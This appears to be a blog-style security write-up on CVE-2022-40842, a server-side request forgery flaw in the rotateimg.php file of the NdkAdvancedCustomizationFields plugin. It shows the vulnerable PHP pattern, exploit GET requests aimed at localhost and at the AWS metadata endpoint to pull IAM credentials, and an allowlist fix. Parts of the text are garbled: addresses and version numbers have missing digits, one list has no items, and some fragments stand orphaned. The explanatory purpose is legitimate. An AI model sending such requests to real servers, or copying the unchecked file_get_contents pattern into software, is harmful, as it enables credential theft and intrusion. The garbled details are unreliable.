CVE-2022-40842 - SSRF Vulnerability in ndk design NdkAdvancedCustomizationFields 3.5. via rotateimg.php

In 2022, a significant security flaw (CVE-2022-40842) was discovered in the ndk design NdkAdvancedCustomizationFields 3.5. WordPress plugin. The issue? A Server-Side Request Forgery (SSRF) bug in rotateimg.php. This vulnerability can allow attackers to trick the server into making HTTP requests to arbitrary locations, which may expose internal services, leak data, or lead to further exploitation.

Let's break down how this works, how it can be exploited, and what you should do about it—all in straightforward language.

What Is SSRF?

Server-Side Request Forgery (SSRF) is when an attacker can make your server send HTTP requests to any destination—sometimes even behind your firewall. Often abused to:

About NdkAdvancedCustomizationFields and The Issue

ndk design NdkAdvancedCustomizationFields is a plugin for extending site customization on WordPress. In version 3.5., the rotateimg.php file fails to sanitize input URLs properly.

Vulnerable Code Snippet (Simplified)

Inside rotateimg.php, the plugin accepts a parameter like img_url and passes it to a function for image processing. There's no check to confirm the URL is safe or points to an external or trusted location.

// rotateimg.php (simplified example)
if (isset($_GET['img_url'])) {
    $img_url = $_GET['img_url'];
    $img_data = file_get_contents($img_url); // <== Dangerous!
    // ... process $img_data ...
}

Problem: The code fetches whatever resource is specified by img_url, no matter where it points!

How does an attacker exploit this?

Suppose the website uses NdkAdvancedCustomizationFields 3.5. and exposes rotateimg.php publicly. An attacker sends a crafted HTTP GET request:

GET /wp-content/plugins/ndk-advanced-customization-fields/rotateimg.php?img_url=http://127...1:808/admin HTTP/1.1
Host: victim.com

- The target server fetches http://127...1:808/admin from itself (localhost).
- If there's a sensitive admin interface at that address, the attacker may get private information or even trigger unwanted actions.

Internal admin panels (localhost or internal-only IPs)

- AWS/GCP metadata endpoints (e.g., http://169.254.169.254/latest/meta-data/)

Example Exploit: Read AWS Metadata

GET /wp-content/plugins/ndk-advanced-customization-fields/rotateimg.php?img_url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1
Host: victim.com

This might return the server's internal AWS credentials if the site is hosted on EC2.

Steal sensitive data

This can escalate into privilege escalation, data breach, or even total server compromise.

References

- Official CVE Entry: CVE-2022-40842
- Original Advisory: Exploit Database EDB-ID 50768
- WordPress Plugin Page

How To Fix It

If you use this plugin:  
- Update: Check with the vendor for patched versions. If none is available, disable or remove the plugin.

Example Mitigation

// Allowed domains only!
$allowed_domains = ['trusted.com'];
$parsed_url = parse_url($img_url);
if (in_array($parsed_url['host'], $allowed_domains)) {
    $img_data = file_get_contents($img_url);
} else {
    die('Invalid image source.');
}

Conclusion

CVE-2022-40842 is a strong reminder of the risks of insecure input handling, especially with URLs. If you're running ndk design NdkAdvancedCustomizationFields 3.5., act now to secure your site.

Stay alert—patch fast and review third-party add-ons regularly.

*For further details, view the links above or reach out to WordPress security communities. Always report unusual activity to your hosting provider or your security team!*

Timeline

Published on: 11/22/2022 01:15:00 UTC
Last modified on: 11/23/2022 16:04:00 UTC